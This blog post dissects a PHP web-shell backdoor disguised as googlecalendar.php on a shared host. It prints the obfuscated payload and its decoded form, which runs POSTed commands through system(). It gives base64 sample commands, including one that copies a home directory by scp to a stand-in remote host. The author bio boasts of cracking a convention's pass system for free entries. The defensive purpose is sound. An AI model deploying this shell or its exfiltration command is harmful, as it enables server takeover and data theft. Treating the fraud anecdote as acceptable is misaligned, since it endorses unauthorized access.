DEV

Q: Have you ever been tempted to look into a computer virus, but were too afraid to proceed in fear of an uncontrolled infection?

A: We did. And this is what we found. Not a Virus. A Rat.

Sensitive reader Advisory:
This article goes into the details of a server-side RAT infestation, and will end by aforementioned RAT dissection. At the end, you will even be given the opportunity to TRY THE RAT yourself! (in the confined safety of our lab, of course)

1. Facts…

1. Viruses will infect your server (no matter how well protected you are).
2. If your server is online, you are at risk.
3. Viruses used to be silly malicious software that could damage your computer. Viruses are now clever malicious meanware that will hurt you and others on a large scale.
4. knowledge is power. If you know what is coming your way, you may be able to deflect the attack.

2. Reality Check

1. You (the honest website builder) only have the available tools to protect yourself. We will call that the shield. Them (the malicious hackers) are well aware of the shields you use, their strength, limitations, pitfalls and even bugs. They constantly use smarter, more advanced, distributed technology. Yes, eventually, a better sword will pierce your shield.
2. If you are the IT manager of a fortune 500 company, bother reading this article not. You already know what I am talking about, and the funds you ditch yearly in security exceeds my lifetime salary a few folds already. For the rest of us, who host our sites on one of the well known providers, it is a different story. Infections cross user accounts, enter via ways we, the host customer, have no defense.
3. Viruses plaguing servers have various intentions, generally stealing processor time, server’s bandwidth, server’s content, and, well, money.
4. Know how to identify a server virus. This is what this article is about.

3. What’s a RAT? (R.A.T.)

RAT stands for Remote Administration Tool.

It is a virus that knows no account limit, no time limit, no power limit. It is an incredibly small file, with incredibly little intelligence. Let me compare 3 classes of viruses to clarify that statement:

1. An old school Trojan is a malicious software which you would install yourself on you machine. It presents itself as a sheep, while it is a wolf. Once you run it, all hell breaks loose. Because you would install it yourself, a Trojan can be a rather large piece of software. You generally would know right away you are infected, only too late.
2. A traditional Virus is a small software which tucks itself inside another, otherwise harmless software. Hence the name Virus, which implies infecting larger applications (and hiding there), self replicating capabilities, and of course some malicious objective and often disastrous side effects.
3. a RAT is even smaller than a Virus. Think of it as an inert piece of DNA. It knows nothing, does nothing, can’t reproduce itself on its own. A RAT by itself is harmless. Launch it an nothing happens. Delete it and no harm is done.

4. Why is a RAT dangerous?

A RAT gives total control, I repeat, total control of your computer (i.e. the server) to a another computer, remotely. That remote computer may be located on Mars for all I know, and reproduce like rabbits, install new software, de-activate your virus protection software, delete files, snoop around, trace your activities, read all your information, etc.

Quick, think about something your server can do.
Yes, a RAT can do that too. And using your account credentials while it’s at it.

5. Will a RAT disable my computer?

Unlikely. The strength of a RAT is it’s stealth mode operation. Removing files, compromising your server mode of operation, or being discovered is probably the last thing a RAT will do. That would be a suicidal RAT, but in order to disable a system on a large scale, this is entirely conceivable.

Few secret agents wear the official secret agent outfit (dark glasses, cool hat, long coat, and newspaper to hide behind). RAT is no exception.

6. Will a RAT make unauthorized use of my server?

Likely. And others, too. It will send spam, trace transactions, and multiply discreetly. The more RAT around, the harder to eradicate.

7. Can I protect myself against a RAT?

If you host your own domain on your own system, possibly. This is beyond the scope of this article.

If you use an external host on a shared computer, this responsibility is shared between you and that host. Your responsibility is to keep your directories non writable when possible, and report suspect files, while the host’s responsibility is to take immediate action if an infection occurs.

Do not rely on that statement! The reason I am writing this article in the first place is that a national provider has been infected, and while we gave said host all information about the infection, their response was to change our FTP password, randomly, once a week.

Let me make that clear. Bleeding a patient rarely improves a fever.

8. What to do when infected?

1. rename the suspicious file right away. Do not delete it! If that file was not a RAT, you may permanently damage your own server! Renaming it will give you a chance to reactivate the offending file, if it was not a RAT after all.
2. Remove it’s executable permission. Native server RAT will be executable by definition, so that may be a valid method. Know that this may not be enough.
3. Move it to a different directory. Chances are the remote computer won’t find it, at least right away
4. ZIP it! A compressed RAT (or Virus, or Trojan) is, by definition, disabled.
5. Send that ZIP file to us for analysis ! (dev@thegothicparty.com). Time permits, we will look at it and suggest appropriate action.

I recommend renaming a potential RAT as your first line of defense.

9. A RAT dissection

I will spare you the gory details. Here is a step-by-step analysis of the remote access tool that infected <name withheld> national provider mentioned above.

9.1. File specifics

• Original virus name, as stored on the server:
  googlecalendar.php
  We had never installed googlecalendar in that well controlled environment, so the presence of that file was rather suspicious.
• Original virus content, when opened with a text editor:

  <?php $X=basename(__FILE__); $l="aWYoJF9QT1NUWyJsaW5rIl0peyRzdW0
  9c3Vic3RyKCRfUE9TVFsibGluayJdLCBzdHJsZW4oJF9QT1NUWyJsaW5rIl0pLTQ
  sc3RybGVuKCRfUE9TVFsibGluayJdKS0xKTsgaWYoJHN1bT0iMWpYIil7JGxpbms
  9YmFzZTY0X2RlY29kZShzdWJzdHIoJF9QT1NUWyJsaW5rIl0sIDAsIHN0cmxlbig
  kX1BPU1RbImxpbmsiXSktNCkpOyBAc3lzdGVtKCRsaW5rKTt9fQ=="; eval(bas
  e64_decode($l)); ?>

9.2. aWYoJF9QT1N… etc. what? English please.

Substituting the stream of evidently obfuscated 276 characters by “obfuscated”, adding some formatting, and some comments:

<?php                         // Execute the following PHP script
    $X=basename(__FILE__);    // Store where we're at into $X
    $l="obfuscated";          // Put some {magic} into $l
    eval(                     // execute the {magic}
        base64_decode($l)     // decode "obfuscated"
    );
?>

The eval command is the danger here, and replacing eval by echo and merely executing the PHP script transforms “obfuscated” into this dangerous algorightm:

if($_POST["link"]){$sum=substr($_POST["link"], strlen($_POST["li
nk"])-4,strlen($_POST["link"])-1); if($sum="1jX"){$link=base64_d
ecode(substr($_POST["link"], 0, strlen($_POST["link"])-4)); @sys
tem($link);}}

Almost there!

9.3. Here is the formatted source code…

Reversed-engineered by our good people at the lab, conveniently indented and commented, it turns out to be a well written piece of code, which will execute without flaws. Dynamic commands can be generated remotely, executed by the RAT, and the results sent back to the originating organization.

if( $_POST["link"]) {  // Retrieve the link parameter in the URL
                       // In this RAT, it will look like this:
                       // {yourserver}/googlecalendar.php?link={magic}
    $sum=substr( $_POST["link"],
                 strlen($_POST["link"])-4,
                 strlen($_POST["link"])-1);
                       // extract a signature from <magic>
                       // It is made up of 3 characters at the end
    if( $sum="1jX") {
                       // If the signature matches, then decode it
                       // using MIME base64.
                       // Note that the hacker permanently hardcoded
                       // the signature as "1jx"
        $link=base64_decode( substr($_POST["link"],
                             0,
                             strlen($_POST["link"])-4));
                       // convert {magic} (minus the signature)
                       // into a command. There is no further
                       // verification that this command is valid.
        @system($link);
                       // use @ to suppress error, warnings and
                       // order the system to execute the command!
    }
}

9.4. How to find this virus on your system?

[~] grep -r "base64_decode" .

RAT – Dead.

10. Experiment with the RAT

Disclaimer: The RAT you are about to try is, well, in a coma. It will analyze the parameters you are sending, and stop short of executing the command. The result will be displayed in a new window. Neither you nor the server hosting thegothicparty.com is at risk.

10.1. Here are some RAT commands ready to try:

1. bHMgLWFs1jx=
   (List the content of the current directory)
2. Y2htb2QgIHggZmlsZQ==1jx=
   (Make a file executable, so it can be run)
3. c2NwIC1yIH4gdGhpZWZAc29tZS5sb2NhdGlvbi5vbi5tYXJz1jx=
   (Copy the entire user directory to a remote location)

10.2. Create your own RAT commands and try them out!

Use this URL to create a Linux command, encode it in base 64, add the password, and then feed the result to the RAT!

1. Substitute {your-command} by, well, your command.

   http://thegothicparty.com/dev/wp-content/extras/server-side-virus-rat/base64.php?raw={your-command}

2. Now that you have an encoded command, us it to invoke the RAT

   http://thegothicparty.com/dev/wp-content/extras/server-side-virus-rat/rat.php?link={encoded-command}

If you succeed, you will get to a page that says “@system(do-something-horrible)”, which in the original RAT could have had disastrous effects. Good thing you are in the lab!

This makes you a hacker, I think…

11. About the Author

I have written shield and swords for as long as I have been developing software. In reverse order, here are some interesting swords:

1. Cracked some authentication method used by <name withheld> convention, and came out with about 70 free passes overnight. Paid full price for the entry fee, then re-entered <name withheld> convention with one of the free code, and proceeded to distribute my resume to security companies in order to land a job as a legal hacker, finding cracks in their system in order to improve it. Some simply kicked me out of their stand, some were both intimidated and scared, and no-one called me back.
2. Cracked the user’s password for <name withheld> who had lost access to his online service information. Connected a computer to his network, made my computer act as a host (to which his computer blindly trusted), led his software think it was communicating with a distant server.
3. Cracked the administrative password for <name withheld>, an accounting software, while the company’s accountant had been fired and was nowhere to be found. Created 2 new fresh installation of said software, with 2 carefully chosen set of data, and diff’ed the two. The password was the name of his girfriend, and the company that ordered the work never paid as promised.
4. Cracked some other <name withheld> applications which are too sensitive to reveal here.

And here is a list of the most famous shields I wrote:

1. <name withheld>
2. <name withheld>
3. etc.